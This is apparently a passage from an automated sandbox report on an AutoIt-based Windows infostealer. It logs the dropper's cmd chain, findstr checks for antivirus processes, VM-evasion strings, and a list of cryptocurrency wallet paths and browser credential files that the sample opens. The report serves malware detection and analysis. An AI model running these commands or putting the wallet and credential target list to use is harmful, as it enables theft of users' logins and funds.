                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A95EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00A95EDA
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00AA33B7
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        Source: C:\Users\user\Desktop\file.exeStalling execution: Execution stalls by calling Sleepgraph_0-3897
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifAPI coverage: 4.3 %
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 4036Thread sleep count: 39 > 30Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00AE4005
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00AE494A
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00AEC2FF
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00AECD9F
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AECD14 FindFirstFileW,FindClose,11_2_00AECD14
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00AEF5D8
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00AEF735
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00AEFA36
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00AE3CE2
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A95D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00A95D13
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                        Source: Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWjj
                        Source: ECGDHD.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                        Source: ECGDHD.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                        Source: ECGDHD.11.drBinary or memory string: discord.comVMware20,11696487552f
                        Source: ECGDHD.11.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                        Source: ECGDHD.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                        Source: Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: ECGDHD.11.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: tasks.office.comVMware20,11696487552o
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: global block list test formVMware20,11696487552
                        Source: Webster.pif, 0000000B.00000002.3322051688.0000000001ABC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552t
                        Source: ECGDHD.11.drBinary or memory string: AMC password management pageVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                        Source: ECGDHD.11.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: dev.azure.comVMware20,11696487552j
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                        Source: ECGDHD.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                        Source: ECGDHD.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                        Source: ECGDHD.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                        Source: ECGDHD.11.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                        Source: ECGDHD.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                        Source: Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                        Source: ECGDHD.11.drBinary or memory string: outlook.office.comVMware20,11696487552s
                        Source: ECGDHD.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                        Source: ECGDHD.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                        Source: ECGDHD.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AF45D5 BlockInput,11_2_00AF45D5
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A95240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00A95240
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AB5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00AB5CAC
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AD88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00AD88CD
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AAA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00AAA385
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AAA354 SetUnhandledExceptionFilter,11_2_00AAA354
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifMemory protected: page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Yara matchFile source: Process Memory Space: Webster.pif PID: 5740, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AD9369 LogonUserW,11_2_00AD9369
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A95240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00A95240
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE1AC6 SendInput,keybd_event,11_2_00AE1AC6
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE51E2 mouse_event,11_2_00AE51E2
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 229536
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ReprintVerificationMercyRepository" Elliott
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Exhibit + Rand + Hours 229536\U
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\229536\Webster.pif 229536\Webster.pif 229536\U
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AD88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00AD88CD
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00AE4F1C
                        Source: file.exe, 00000000.00000003.2093930678.00000000026C2000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000000.2124599866.0000000000B36000.00000002.00000001.01000000.00000006.sdmp, Webster.pif.2.dr, Cu.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                        Source: Webster.pifBinary or memory string: Shell_TrayWnd
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA885B cpuid 11_2_00AA885B
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AC0030 GetLocalTime,__swprintf,11_2_00AC0030
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AC0722 GetUserNameW,11_2_00AC0722
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AB416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00AB416A
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 11.2.Webster.pif.47f0000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Webster.pif.1b4b810.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Webster.pif.17ad098.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Webster.pif.1b4b810.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Webster.pif.17ad098.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Webster.pif PID: 5740, type: MEMORYSTR
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                        Source: Webster.pif Binary or memory string: WIN_81
                        Source: Webster.pif Binary or memory string: WIN_XP
                        Source: Webster.pif Binary or memory string: WIN_XPe
                        Source: Webster.pif Binary or memory string: WIN_VISTA
                        Source: Webster.pif Binary or memory string: WIN_7
                        Source: Webster.pif Binary or memory string: WIN_8
                        Source: Cu.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                        Source: Yara match File source: 0000000B.00000002.3322725102.000000000495E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: Webster.pif PID: 5740, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match File source: sslproxydump.pcap, type: PCAP
                        Source: Yara match File source: 11.2.Webster.pif.47f0000.6.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 11.2.Webster.pif.1b4b810.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 11.2.Webster.pif.17ad098.1.raw.unpack, type: UNPACKEDPE
